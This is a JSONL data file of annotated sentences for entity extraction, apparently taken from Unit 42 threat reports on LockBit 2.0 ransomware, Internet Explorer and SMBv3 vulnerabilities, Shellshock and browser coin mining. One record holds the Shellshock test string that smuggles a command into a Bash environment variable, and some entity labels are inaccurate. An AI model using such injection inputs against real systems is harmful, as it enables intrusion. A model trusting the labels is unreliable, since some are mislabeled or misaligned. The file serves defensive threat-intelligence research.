-{"id":2667,"text":"Its most highly targeted industry verticals include professional services, construction, wholesale and retail and manufacturing.","entities":[],"relations":[],"Comments":[]} -{"id":2668,"text":" When looking at leak site data across all ransomware families, we’ve observed LockBit 2.0 targeting the highest number of organizations in the following regions: JAPAC, EMEA, and LATAM.","entities":[{"id":47862,"label":"location","start_offset":163,"end_offset":168},{"id":47863,"label":"location","start_offset":170,"end_offset":174},{"id":47864,"label":"location","start_offset":180,"end_offset":185},{"id":47861,"label":"threat-actor","start_offset":79,"end_offset":90}],"relations":[],"Comments":[]} -{"id":2669,"text":" Cases handled by Unit 42 security consultants involving LockBit 2.0 since its appearance in June 2021 demonstrate shorter dwell times and less flexibility in negotiation in the beginning of FY 2022 (measured October-September) in comparison to the end of FY 2021.","entities":[{"id":47869,"label":"TIME","start_offset":209,"end_offset":226},{"id":47868,"label":"TIME","start_offset":191,"end_offset":198},{"id":47865,"label":"identity","start_offset":18,"end_offset":25},{"id":47866,"label":"threat-actor","start_offset":57,"end_offset":68},{"id":47867,"label":"TIME","start_offset":93,"end_offset":102},{"id":47870,"label":"TIME","start_offset":256,"end_offset":263}],"relations":[],"Comments":[]} -{"id":2670,"text":"The following data is broken into fiscal years and quarters based on when the threat actor breached the network, not when the activity was noticed by a client.","entities":[],"relations":[],"Comments":[]} -{"id":2671,"text":" LockBit 2.0 has shown a decrease in dwell time in FY 2022.","entities":[{"id":47872,"label":"TIME","start_offset":51,"end_offset":58},{"id":47871,"label":"threat-actor","start_offset":1,"end_offset":12}],"relations":[],"Comments":[]} -{"id":2672,"text":"From the last two quarters of FY 2021 to the first two quarters of FY 2022, there has been an average 37-day difference. ","entities":[{"id":47873,"label":"TIME","start_offset":30,"end_offset":37},{"id":47874,"label":"TIME","start_offset":67,"end_offset":74}],"relations":[],"Comments":[]} -{"id":2673,"text":"The difference in initial and final ransom demands over the past fiscal year has been converted to percentages and then averaged.","entities":[],"relations":[],"Comments":[]} -{"id":2674,"text":"The graph below demonstrates that at the end of FY 2021, threat actors using LockBit 2.0 were much more open to negotiations of ransom amounts; during that time the ransom was dropped approximately 83% from the initial ask on average.","entities":[{"id":47875,"label":"TIME","start_offset":48,"end_offset":55},{"id":47876,"label":"threat-actor","start_offset":77,"end_offset":88}],"relations":[],"Comments":[]} -{"id":2675,"text":"In comparison, we see less flexibility in FY 2022 Q1 and Q3 – threat actors only offered an average of about 30% as a price drop.","entities":[{"id":47877,"label":"TIME","start_offset":42,"end_offset":59}],"relations":[],"Comments":[]} -{"id":2676,"text":"FY 2022 Q2 is not included due to lack of sufficient information.","entities":[{"id":47878,"label":"TIME","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":2677,"text":" Technically speaking, we have observed LockBit 2.0 affiliates leveraging the following tactics, techniques and procedures: Windows SysInternals PsExec has been utilized for both persistence and execution purposes.","entities":[{"id":47880,"label":"threat-actor","start_offset":40,"end_offset":51},{"id":47879,"label":"tools","start_offset":125,"end_offset":152}],"relations":[{"id":365,"from_id":47880,"to_id":47879,"type":"uses"}],"Comments":[]} -{"id":2678,"text":"Its ability to execute processes on other systems spread the ransomware and assisted in reconnaissance activities.","entities":[],"relations":[],"Comments":[]} -{"id":2679,"text":" LockBit 2.0 was developed using the Assembly and Origin C programming languages and leverages advanced encryption standard (AES) and elliptic-curve cryptography (ECC) algorithms to encrypt victim data.","entities":[{"id":47881,"label":"threat-actor","start_offset":2,"end_offset":13}],"relations":[],"Comments":[]} -{"id":2680,"text":"It can affect both Windows and Linux OS, as the operator released a Linux version of LockBit 2.0 to target VMware ESXi hypervisor systems in October 2021, coded exclusively in the C programming language.","entities":[{"id":47882,"label":"SOFTWARE","start_offset":19,"end_offset":26},{"id":47883,"label":"SOFTWARE","start_offset":31,"end_offset":39},{"id":47884,"label":"SOFTWARE","start_offset":68,"end_offset":73},{"id":47886,"label":"SOFTWARE","start_offset":107,"end_offset":118},{"id":47887,"label":"TIME","start_offset":141,"end_offset":153},{"id":47885,"label":"threat-actor","start_offset":85,"end_offset":97}],"relations":[],"Comments":[]} -{"id":2681,"text":" The LockBit group claimed that LockBit 2.0 is “the fastest encryption software all over the world” and provided a comparative table showing the encryption speed of various ransomware samples. LockBit 2.0 also contains a self-spreading feature, clears logs and can print the ransom note on network printers until the paper runs out. A management panel that affiliates can use to manage victims and affiliate accounts, generate new ransomware builds and generate the decryptor if the demanded ransom is paid also exists.","entities":[{"id":47888,"label":"threat-actor","start_offset":5,"end_offset":12},{"id":47889,"label":"malware","start_offset":32,"end_offset":43},{"id":47890,"label":"threat-actor","start_offset":194,"end_offset":205}],"relations":[{"id":367,"from_id":47889,"to_id":47888,"type":"authored-by"}],"Comments":[]} -{"id":2682,"text":"LockBit 2.0 operators also released an information-stealer dubbed StealBit, which was developed to support affiliates of the LockBit 2.0 RaaS when exfiltrating data from breached companies.","entities":[{"id":45655,"label":"malware","start_offset":66,"end_offset":74},{"id":45654,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":45656,"label":"threat-actor","start_offset":125,"end_offset":136}],"relations":[{"id":111,"from_id":45655,"to_id":45654,"type":"authored-by"}],"Comments":[]} -{"id":2683,"text":" StealBit contains the following capabilities:","entities":[{"id":47891,"label":"malware","start_offset":1,"end_offset":9}],"relations":[],"Comments":[]} -{"id":2684,"text":" The operator of LockBit 2.0 has provided a comparative table speed showing the information stealer compared to other tools.","entities":[{"id":47892,"label":"threat-actor","start_offset":17,"end_offset":28},{"id":47893,"label":"attack-pattern","start_offset":80,"end_offset":99}],"relations":[],"Comments":[]} -{"id":2685,"text":" There was a bug that existed in LockBit 2.0 that allowed researchers to revert the encryption process on an MSSQL database.","entities":[{"id":47894,"label":"SOFTWARE","start_offset":109,"end_offset":114},{"id":45657,"label":"threat-actor","start_offset":32,"end_offset":44}],"relations":[],"Comments":[]} -{"id":2686,"text":"After the bug’s disclosure, LockBit forum members discussed how the bug will not exist in LockBit’s next iteration.","entities":[{"id":47895,"label":"threat-actor","start_offset":28,"end_offset":49},{"id":8199,"label":"malware","start_offset":90,"end_offset":97}],"relations":[],"Comments":[]} -{"id":2687,"text":"Moreover, on March 17, LockBit forum members mentioned the release of LockBit’s next version in one or two weeks.","entities":[{"id":47896,"label":"TIME","start_offset":13,"end_offset":21},{"id":8201,"label":"malware","start_offset":23,"end_offset":30},{"id":8202,"label":"malware","start_offset":70,"end_offset":77}],"relations":[],"Comments":[]} -{"id":2688,"text":"On March 25, VX underground posted a tweet with details of this new version, dubbed LockBit Black.","entities":[{"id":45658,"label":"identity","start_offset":13,"end_offset":27},{"id":45659,"label":"TIME","start_offset":3,"end_offset":11},{"id":45661,"label":"malware","start_offset":84,"end_offset":97}],"relations":[],"Comments":[]} -{"id":2689,"text":" Several adversarial techniques were observed in this activity and the following measures are suggested within Palo Alto Networks products and services to ensure mitigation of threats related to LockBit 2.0 ransomware, as well as other malware using similar techniques: Exploit Public-Facing Application [T1190], Command and Scripting Interpreter [T1059], Local Account [T1136.001], Web Shell [T1505.003], Exploitation for Privilege Escalation [T1068], Indicator Removal on Host [T1070], Deobfuscate\/Decode Files or Information [T1140], Disable or Modify Tools [T1562.001], Hidden Window [T1564.003], Valid Accounts [T1078], External Remote Services [T1133], Scheduled Task [T1053.005], Bypass User Account Control [T1548.002], Group Policy Modification [T1484.001] OS Credential Dumping [T1003], Credentials from Password Stores [T1555] Network Service Scanning [T1046], Process Discovery [T1057], System Location Discovery [T1614], System Information Discovery [T1082] Remote Services [T1021], SMB\/Windows Admin Shares [T1021.002] Remote Access Software [T1219] Data Transfer Size Limits [T1030], Exfiltration Over C2 Channel [T1041] Data Encrypted for Impact [T1486], Service Stop [T1489] †These capabilities are part of the NGFW security subscriptions service","entities":[{"id":47897,"label":"identity","start_offset":111,"end_offset":129},{"id":47898,"label":"threat-actor","start_offset":195,"end_offset":206},{"id":47899,"label":"attack-pattern","start_offset":271,"end_offset":312},{"id":47901,"label":"attack-pattern","start_offset":357,"end_offset":382},{"id":47910,"label":"attack-pattern","start_offset":729,"end_offset":766},{"id":47911,"label":"attack-pattern","start_offset":799,"end_offset":839},{"id":47913,"label":"attack-pattern","start_offset":875,"end_offset":900},{"id":47914,"label":"attack-pattern","start_offset":937,"end_offset":973},{"id":47915,"label":"attack-pattern","start_offset":975,"end_offset":998},{"id":47918,"label":"attack-pattern","start_offset":1105,"end_offset":1141},{"id":47919,"label":"attack-pattern","start_offset":1143,"end_offset":1176},{"id":47922,"label":"attack-pattern","start_offset":902,"end_offset":935},{"id":47923,"label":"attack-pattern","start_offset":1038,"end_offset":1068},{"id":47924,"label":"attack-pattern","start_offset":1178,"end_offset":1198},{"id":47900,"label":"attack-pattern","start_offset":314,"end_offset":355},{"id":47902,"label":"attack-pattern","start_offset":407,"end_offset":452},{"id":47903,"label":"attack-pattern","start_offset":454,"end_offset":487},{"id":47904,"label":"attack-pattern","start_offset":538,"end_offset":573},{"id":47905,"label":"attack-pattern","start_offset":575,"end_offset":600},{"id":47906,"label":"attack-pattern","start_offset":602,"end_offset":624},{"id":47907,"label":"attack-pattern","start_offset":626,"end_offset":658},{"id":47908,"label":"attack-pattern","start_offset":660,"end_offset":686},{"id":47909,"label":"attack-pattern","start_offset":688,"end_offset":727},{"id":47912,"label":"attack-pattern","start_offset":841,"end_offset":873},{"id":47916,"label":"attack-pattern","start_offset":1000,"end_offset":1036},{"id":47917,"label":"attack-pattern","start_offset":1070,"end_offset":1103},{"id":47920,"label":"attack-pattern","start_offset":384,"end_offset":405},{"id":47921,"label":"attack-pattern","start_offset":489,"end_offset":536},{"id":47925,"label":"attack-pattern","start_offset":768,"end_offset":797}],"relations":[],"Comments":[]} -{"id":2690,"text":"Note: This is not an all-inclusive list of the protections provided by Palo Alto Networks.","entities":[{"id":8237,"label":"identity","start_offset":71,"end_offset":89}],"relations":[],"Comments":[]} -{"id":2691,"text":"This is a subset of our current Courses of Action initiative and will be updated as the project progresses.","entities":[],"relations":[],"Comments":[]} -{"id":2692,"text":" LockBit 2.0 and its evolution over time is a perfect example to illustrate the persistence, increasing complexity and impact brought by the ransomware landscape as a whole.","entities":[{"id":47926,"label":"attack-pattern","start_offset":2,"end_offset":13}],"relations":[],"Comments":[]} -{"id":2693,"text":"With claims of this RaaS offering the fastest encryption on the ransomware market, coupled with the fact that it has been delivered in high volume by experienced affiliates, this RaaS poses a significant threat.","entities":[],"relations":[],"Comments":[]} -{"id":2694,"text":"LockBit’s continuation with operations and its next iteration coming up on the horizon means that organizations and their security teams need to stay vigilant in the ever-evolving threat landscape.","entities":[{"id":47927,"label":"threat-actor","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":2695,"text":"Palo Alto Networks detects and prevents LockBit 2.0 ransomware in the following ways:","entities":[{"id":47928,"label":"identity","start_offset":0,"end_offset":18},{"id":47929,"label":"threat-actor","start_offset":40,"end_offset":51}],"relations":[],"Comments":[]} -{"id":2696,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.","entities":[{"id":47932,"label":"identity","start_offset":248,"end_offset":269},{"id":47930,"label":"identity","start_offset":92,"end_offset":99},{"id":47931,"label":"identity","start_offset":133,"end_offset":151}],"relations":[],"Comments":[]} -{"id":2697,"text":"CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.","entities":[{"id":45663,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":2698,"text":"Learn more about the Cyber Threat Alliance.","entities":[{"id":47933,"label":"identity","start_offset":21,"end_offset":42}],"relations":[],"Comments":[]} -{"id":2699,"text":" In August 2021, a Russian blogger published a 22-minute interview with an alleged representative of the group behind LockBit 2.0 called “LockBitSupp” on a YouTube channel called “Russian-language open source intelligence (OSINT).”","entities":[{"id":47935,"label":"location","start_offset":18,"end_offset":26},{"id":47934,"label":"TIME","start_offset":4,"end_offset":15},{"id":47936,"label":"threat-actor","start_offset":118,"end_offset":129},{"id":47937,"label":"SOFTWARE","start_offset":156,"end_offset":163}],"relations":[],"Comments":[]} -{"id":2700,"text":"The same Russian blogger previously published interviews with a representative of the group behind the REvil ransomware-as-a-service (RaaS), hackers and security experts.","entities":[{"id":47938,"label":"threat-actor","start_offset":103,"end_offset":108}],"relations":[],"Comments":[]} -{"id":2701,"text":" Some key takeaways from the claims made in the interview were: LockBit 3.0: Another Upgrade to the World’s Most Active Ransomware Ransomware Groups to Watch: Emerging Threats Average Ransom Payment Up 71% This Year, Approaches $1 Million 2022 Unit 42 Ransomware Threat Report Highlights Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":47939,"label":"threat-actor","start_offset":64,"end_offset":75},{"id":47940,"label":"identity","start_offset":244,"end_offset":251}],"relations":[],"Comments":[]} -{"id":2702,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2703,"text":" By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":2704,"text":"On Saturday, Microsoft disclosed a critical vulnerability in Internet Explorer, CVE-2014-1776, affecting Internet Explorer versions 6 through 11.","entities":[{"id":47941,"label":"TIME","start_offset":3,"end_offset":11},{"id":47942,"label":"identity","start_offset":13,"end_offset":22},{"id":47944,"label":"vulnerability","start_offset":80,"end_offset":93},{"id":47945,"label":"SOFTWARE","start_offset":105,"end_offset":133},{"id":47943,"label":"SOFTWARE","start_offset":61,"end_offset":78}],"relations":[{"id":368,"from_id":47944,"to_id":47945,"type":"has"}],"Comments":[]} -{"id":2705,"text":"The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated.","entities":[{"id":47946,"label":"SOFTWARE","start_offset":41,"end_offset":58}],"relations":[],"Comments":[]} -{"id":2706,"text":"The vulnerability allows an attacker to execute arbitrary code in the context of the current user within Internet Explorer.","entities":[{"id":47947,"label":"attack-pattern","start_offset":40,"end_offset":62},{"id":45668,"label":"SOFTWARE","start_offset":105,"end_offset":122}],"relations":[],"Comments":[]} -{"id":2707,"text":"This could be exploited with drive-by downloads or watering-hole attacks, and has been observed being used in attacks in the wild.","entities":[{"id":47948,"label":"attack-pattern","start_offset":51,"end_offset":72},{"id":47949,"label":"attack-pattern","start_offset":29,"end_offset":47}],"relations":[],"Comments":[]} -{"id":2708,"text":" The exploit code used in these attacks only targets IE versions 9, 10 and 11, but earlier versions are still vulnerable.","entities":[{"id":47950,"label":"SOFTWARE","start_offset":53,"end_offset":77}],"relations":[],"Comments":[]} -{"id":2709,"text":"As of this writing, Microsoft has not stated when a patch for the vulnerability will be available, but in its advisory the company provided multiple work-arounds.","entities":[{"id":45669,"label":"identity","start_offset":20,"end_offset":29}],"relations":[],"Comments":[]} -{"id":2710,"text":"Additionally, Windows XP systems running IE 6, 7 and 8 are also vulnerable, but will not receive a patch, as Microsoft no longer supports them.","entities":[{"id":47953,"label":"identity","start_offset":109,"end_offset":118},{"id":47951,"label":"SOFTWARE","start_offset":14,"end_offset":24},{"id":47952,"label":"SOFTWARE","start_offset":41,"end_offset":54}],"relations":[],"Comments":[]} -{"id":2711,"text":" It is always important to view this type of critical vulnerability in the larger context of the threat landscape.","entities":[],"relations":[],"Comments":[]} -{"id":2712,"text":"Attackers identify thousands of critical vulnerabilities in commonly used software each year, such as Internet Explorer.","entities":[{"id":45670,"label":"SOFTWARE","start_offset":102,"end_offset":119}],"relations":[],"Comments":[]} -{"id":2713,"text":"Once identified, they then craft a seemingly endless supply of exploits that leverage these vulnerabilities to deliver unknown malware and compromise networks and endpoints.","entities":[],"relations":[],"Comments":[]} -{"id":2714,"text":"Palo Alto Networks enterprise security platform is focused on providing an integrated approach to detecting and preventing advanced threats across each step in the attack kill-chain.","entities":[{"id":47954,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} -{"id":2715,"text":"Bringing together our next-generation firewall – again a Gartner Magic Quadrant Leader – Threat Prevention, URL Filtering, WildFire, and Cyvera’s ability to prevent exploitation of unknown vulnerabilities will allow us to continue offering ground-breaking protection for our customers’ networks and endpoints, including Windows XP clients.","entities":[{"id":45672,"label":"SOFTWARE","start_offset":137,"end_offset":143},{"id":45671,"label":"SOFTWARE","start_offset":123,"end_offset":131},{"id":45673,"label":"SOFTWARE","start_offset":320,"end_offset":330}],"relations":[],"Comments":[]} -{"id":2716,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2717,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2718,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":2719,"text":"This post is also available in: 日本語 (Japanese) In March 2020 Microsoft released a security advisory, ADV200005 | Microsoft Guidance for Disabling SMBv3 Compression, for a new remote code execution (RCE) vulnerability.","entities":[{"id":47955,"label":"TIME","start_offset":56,"end_offset":66},{"id":47956,"label":"identity","start_offset":67,"end_offset":76},{"id":47958,"label":"SOFTWARE","start_offset":152,"end_offset":157},{"id":47960,"label":"attack-pattern","start_offset":181,"end_offset":208},{"id":47957,"label":"identity","start_offset":119,"end_offset":128}],"relations":[],"Comments":[]} -{"id":2720,"text":"Shortly after this advisory was released, Microsoft issued an out-of-band patch to protect affected users from CVE-2020-0796.","entities":[{"id":47962,"label":"vulnerability","start_offset":111,"end_offset":124},{"id":47961,"label":"identity","start_offset":42,"end_offset":51}],"relations":[],"Comments":[]} -{"id":2721,"text":" An out-of-band patch is typically released outside of the expected update period for a vendor.","entities":[],"relations":[],"Comments":[]} -{"id":2722,"text":" In this particular case, Microsoft is known to release updates on Patch Tuesday, which was two days prior to this out-of-band update.","entities":[{"id":47963,"label":"SOFTWARE","start_offset":26,"end_offset":35}],"relations":[],"Comments":[]} -{"id":2723,"text":" This vulnerability exists within the Microsoft Server Message Block 3.0 (SMBv3), specifically regarding malformed compression headers.","entities":[{"id":47964,"label":"SOFTWARE","start_offset":39,"end_offset":81}],"relations":[],"Comments":[]} -{"id":2724,"text":"Compression headers are a feature that was added to SMBv3 negotiate context request packets in May 2019.","entities":[{"id":45675,"label":"TIME","start_offset":95,"end_offset":103},{"id":45674,"label":"SOFTWARE","start_offset":52,"end_offset":57}],"relations":[],"Comments":[]} -{"id":2725,"text":"For successful unauthenticated exploitation an attacker would need to craft a SMBv3 packet that contains the malformed compression header to a vulnerable SMBv3 Server.","entities":[{"id":47967,"label":"attack-pattern","start_offset":15,"end_offset":43},{"id":47965,"label":"SOFTWARE","start_offset":154,"end_offset":166},{"id":47966,"label":"SOFTWARE","start_offset":78,"end_offset":83}],"relations":[],"Comments":[]} -{"id":2726,"text":" For SMBv3 clients would require enticing a user to connect to a compromised SMBv3 server that they control.","entities":[{"id":47968,"label":"SOFTWARE","start_offset":5,"end_offset":10},{"id":47969,"label":"SOFTWARE","start_offset":77,"end_offset":82}],"relations":[],"Comments":[]} -{"id":2727,"text":"At the time of release, Microsoft affirmed that they had not yet seen the vulnerability exploited in the wild (ITW).","entities":[{"id":45676,"label":"identity","start_offset":24,"end_offset":33}],"relations":[],"Comments":[]} -{"id":2728,"text":" This vulnerability only affects SMBv3 and the following builds of the Microsoft Windows operating system (OS): Review the workaround guidance provided by the Microsoft Security Vulnerability.","entities":[{"id":47970,"label":"SOFTWARE","start_offset":33,"end_offset":38},{"id":47971,"label":"SOFTWARE","start_offset":71,"end_offset":110},{"id":47972,"label":"identity","start_offset":160,"end_offset":192}],"relations":[],"Comments":[]} -{"id":2729,"text":"As always, we recommend our customers patch their systems as soon as possible.","entities":[],"relations":[],"Comments":[]} -{"id":2730,"text":"Upgrade Cortex XDR and Traps agents for protection against this vulnerability regardless of whether your systems have installed the relevant security update from Microsoft.","entities":[{"id":45677,"label":"SOFTWARE","start_offset":8,"end_offset":18},{"id":45678,"label":"identity","start_offset":162,"end_offset":171}],"relations":[],"Comments":[]} -{"id":2731,"text":"For client mitigation, recommend creating an outbound firewall rule to block SMB outbound on public and private interfaces.","entities":[{"id":47973,"label":"SOFTWARE","start_offset":77,"end_offset":80}],"relations":[],"Comments":[]} -{"id":2732,"text":" Palo Alto Networks Cortex XDR and Traps provide protection against this vulnerability regardless of whether they are running on an unpatched instance of Microsoft Windows 10.","entities":[{"id":47974,"label":"SOFTWARE","start_offset":158,"end_offset":178},{"id":8365,"label":"identity","start_offset":5,"end_offset":23},{"id":8366,"label":"tools","start_offset":24,"end_offset":34}],"relations":[],"Comments":[]} -{"id":2733,"text":"Additionally, Palo Alto Networks offers multiple, additional complementary protections for this exploit.","entities":[{"id":45679,"label":"identity","start_offset":14,"end_offset":32}],"relations":[],"Comments":[]} -{"id":2734,"text":"As a member of the Microsoft Active Protections Program (MAPP) program, Palo Alto Networks received early details of the vulnerability, providing greater understanding of the threat, which helps us implement strong product coverage.","entities":[{"id":47975,"label":"identity","start_offset":72,"end_offset":90},{"id":47976,"label":"identity","start_offset":19,"end_offset":62}],"relations":[],"Comments":[]} -{"id":2735,"text":"As always, we recommend keeping your Microsoft products up to date with the latest patches to mitigate this vulnerability.","entities":[{"id":47977,"label":"identity","start_offset":37,"end_offset":46}],"relations":[],"Comments":[]} -{"id":2736,"text":" Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":45680,"label":"identity","start_offset":1,"end_offset":19}],"relations":[],"Comments":[]} -{"id":2737,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2738,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2739,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":2740,"text":"This post is also available in: 日本語 (Japanese) Around 6:00 am PST on September 24, the details of a vulnerability in the widely used Bourne Again Shell (Bash) were disclosed by multiple Linux vendors.","entities":[{"id":47978,"label":"TIME","start_offset":60,"end_offset":87},{"id":47979,"label":"SOFTWARE","start_offset":192,"end_offset":197},{"id":47980,"label":"SOFTWARE","start_offset":139,"end_offset":164}],"relations":[],"Comments":[]} -{"id":2741,"text":"The vulnerability, assigned CVE-2014-6271 by Mitre, was originally discovered by Stephane Chazelas, a Unix and Linux network and telecom administrator and IT manager at UK robotics company SeeByte, Ltd. ","entities":[{"id":47982,"label":"identity","start_offset":45,"end_offset":50},{"id":47984,"label":"SOFTWARE","start_offset":102,"end_offset":106},{"id":47981,"label":"vulnerability","start_offset":28,"end_offset":41},{"id":47983,"label":"identity","start_offset":81,"end_offset":98},{"id":47986,"label":"identity","start_offset":169,"end_offset":201},{"id":47985,"label":"SOFTWARE","start_offset":111,"end_offset":116}],"relations":[],"Comments":[]} -{"id":2742,"text":"While this vulnerability didn’t come with quite the fanfare or a catchy name like Heartbleed, the security community quickly dubbed it “Shellshock.”","entities":[{"id":45681,"label":"vulnerability","start_offset":82,"end_offset":92},{"id":45682,"label":"vulnerability","start_offset":136,"end_offset":146}],"relations":[],"Comments":[]} -{"id":2743,"text":"Bash is present in most Linux and Unix distributions as well as Apple’s Mac OS X, and there’s a good chance anyone reading this has a system they need to patch.","entities":[{"id":47988,"label":"SOFTWARE","start_offset":34,"end_offset":38},{"id":47987,"label":"SOFTWARE","start_offset":24,"end_offset":29},{"id":47989,"label":"SOFTWARE","start_offset":64,"end_offset":80}],"relations":[],"Comments":[]} -{"id":2744,"text":" Palo Alto Networks initiated an emergency IPS content release to detect this vulnerability last night with Signature ID: 36729 \"Bash Remote Code Execution Vulnerability.” ","entities":[{"id":47990,"label":"identity","start_offset":1,"end_offset":19},{"id":47991,"label":"vulnerability","start_offset":129,"end_offset":169}],"relations":[],"Comments":[]} -{"id":2745,"text":"All versions of PAN-OS and Panorama include the vulnerable version of Bash, but we’ve determined the issue is only exploitable by authenticated users.","entities":[{"id":45683,"label":"SOFTWARE","start_offset":16,"end_offset":22},{"id":45684,"label":"SOFTWARE","start_offset":27,"end_offset":35},{"id":45685,"label":"SOFTWARE","start_offset":70,"end_offset":75}],"relations":[],"Comments":[]} -{"id":2746,"text":"Normal PAN-OS maintenance release updates will provide a fix for the vulnerability.","entities":[{"id":47992,"label":"SOFTWARE","start_offset":7,"end_offset":13}],"relations":[],"Comments":[]} -{"id":2747,"text":"We have posted the advisory on our product vulnerability page.","entities":[],"relations":[],"Comments":[]} -{"id":2748,"text":"Read on for more details.","entities":[],"relations":[],"Comments":[]} -{"id":2749,"text":" Vulnerability Details CVE-2014-6271 exists in all versions of Bash and is related to how environment variables are processed when the shell starts up.","entities":[{"id":47993,"label":"vulnerability","start_offset":24,"end_offset":37},{"id":47994,"label":"tools","start_offset":64,"end_offset":68}],"relations":[{"id":369,"from_id":47994,"to_id":47993,"type":"has"}],"Comments":[]} -{"id":2750,"text":"Environment variables are used by shell software to store pieces of information like the location of the user’s home directory.","entities":[],"relations":[],"Comments":[]} -{"id":2751,"text":"In addition to storing variables, Bash allows for storing shell functions in variables that users can call later.","entities":[{"id":45686,"label":"SOFTWARE","start_offset":34,"end_offset":38}],"relations":[],"Comments":[]} -{"id":2752,"text":"It’s in parsing these functions that the new Bash vulnerability exists, as the shell mistakenly executes code that is added after a function definition.","entities":[{"id":47995,"label":"tools","start_offset":45,"end_offset":49}],"relations":[],"Comments":[]} -{"id":2753,"text":"Here’s an example: $ env x='() { :;}; echo vulnerable'","entities":[],"relations":[],"Comments":[]} -{"id":2754,"text":"bash -c \"echo this is a test\"","entities":[],"relations":[],"Comments":[]} -{"id":2755,"text":" vulnerable this is a test ","entities":[],"relations":[],"Comments":[]} -{"id":2756,"text":"Bash should stop processing the environment variable “x” after the closing semicolon for the function, but instead continues to process “echo vulnerable”.","entities":[],"relations":[],"Comments":[]} -{"id":2757,"text":"At first glance, this might not seem too dangerous as executing commands is Bash’s primary function, but it’s important to understand that many other programs use Bash to process commands.","entities":[{"id":45687,"label":"SOFTWARE","start_offset":76,"end_offset":80},{"id":45688,"label":"SOFTWARE","start_offset":163,"end_offset":167}],"relations":[],"Comments":[]} -{"id":2758,"text":" While these two scenarios are currently the most-likely vectors for exploiting this vulnerability, it’s likely that other services use Bash in a network-exploitable way.","entities":[],"relations":[],"Comments":[]} -{"id":2759,"text":"The only way to fully prevent exploitation is to upgrade Bash on the system to a non-vulnerable version. Impact","entities":[],"relations":[],"Comments":[]} -{"id":2760,"text":"The good news is that this vulnerability was disclosed responsibly and patches are available for most platforms on the day of the public disclosure.","entities":[],"relations":[],"Comments":[]} -{"id":2761,"text":"The bad news is that this vulnerability is going to have a very long tail.","entities":[],"relations":[],"Comments":[]} -{"id":2762,"text":"Bash is the default shell for the most-popular Linux variants and every version of the software stretching back over two decades is vulnerable.","entities":[{"id":47996,"label":"SOFTWARE","start_offset":47,"end_offset":52}],"relations":[],"Comments":[]} -{"id":2763,"text":"Well-maintained systems will be patched today, but that dusty old system in the networking closet might never get the update.","entities":[],"relations":[],"Comments":[]} -{"id":2764,"text":"Additionally, network devices, embedded systems and Internet-connected devices (like IP Cameras) often run Linux and could be vulnerable.","entities":[],"relations":[],"Comments":[]} -{"id":2765,"text":" Fortunately, not every system is remotely exploitable simply because it’s running Bash, it also needs to be running an application which makes Bash accessible over the network.","entities":[{"id":47998,"label":"tools","start_offset":144,"end_offset":148},{"id":47997,"label":"tools","start_offset":83,"end_offset":87}],"relations":[],"Comments":[]} -{"id":2766,"text":"As described above, the most-common exploit scenario seems like it will be web servers running Apache and using CGI scripts.","entities":[{"id":45689,"label":"SOFTWARE","start_offset":95,"end_offset":101},{"id":45690,"label":"SOFTWARE","start_offset":111,"end_offset":115}],"relations":[],"Comments":[]} -{"id":2767,"text":"Web servers are great resources for attackers.","entities":[],"relations":[],"Comments":[]} -{"id":2768,"text":"They can be used to: These are all likely outcomes from mass scanning of the Internet for vulnerable hosts, which are already underway.","entities":[],"relations":[],"Comments":[]} -{"id":2769,"text":" Recommendations Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2770,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":2771,"text":"On January 2, 2017, one Bitcoin was worth US $985.56.","entities":[{"id":47999,"label":"TIME","start_offset":3,"end_offset":18},{"id":48000,"label":"SOFTWARE","start_offset":24,"end_offset":31}],"relations":[],"Comments":[]} -{"id":2772,"text":" By October 16, 2017, that same Bitcoin was worth US $ 5,707.40: a 579% increase in value in ten and a half months.","entities":[{"id":45691,"label":"TIME","start_offset":4,"end_offset":20},{"id":45692,"label":"SOFTWARE","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} -{"id":2773,"text":" By comparison, Ethereum has gone from US $8.15 per ether on January 2, 2017 to US $342.83 per ether on October 16, 2017: a jump of 4,206%. Cryptocurrencies are big money these days and seemingly getting bigger by the day. And if we’ve learned one thing about cybercriminals, they follow the money.","entities":[{"id":48001,"label":"TIME","start_offset":61,"end_offset":76},{"id":48002,"label":"TIME","start_offset":104,"end_offset":120},{"id":48003,"label":"SOFTWARE","start_offset":16,"end_offset":24}],"relations":[],"Comments":[]} -{"id":2774,"text":" So, it’s not surprising to see that cybercrime is turning its attention to cryptocurrencies.","entities":[],"relations":[],"Comments":[]} -{"id":2775,"text":" In our latest research, “Unauthorized Coin Mining in the Browser”, Unit 42 researchers show how cybercriminals have taken an old tactic, hijacking web browsers without the users consent or knowledge (commonly called a “drive -by attack”), and adapted it to make money in the increasingly lucrative cryptocurrencies 